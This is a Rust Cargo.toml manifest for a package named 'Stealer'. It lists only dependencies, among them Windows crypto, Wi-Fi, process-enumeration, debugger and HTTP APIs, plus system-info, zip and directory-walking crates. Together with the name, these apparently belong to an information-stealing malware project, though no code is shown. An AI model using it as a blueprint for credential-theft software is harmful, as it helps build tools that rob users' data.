[package]
name = "Stealer"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
winapi = { version = "0.3.9", features = ["wincon","winuser","setupapi","wlanapi","winnls","fileapi","sysinfoapi", "fibersapi","debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }

ntapi = "0.4.1"
user32-sys = "0.2.0"
raw-cpuid = "11.1.0"
whoami = "1.5.1"
zip = "2.2.0"
globwalk = "0.9.1"
walkdir = "2.5.0"
sysinfo = "0.31.2"
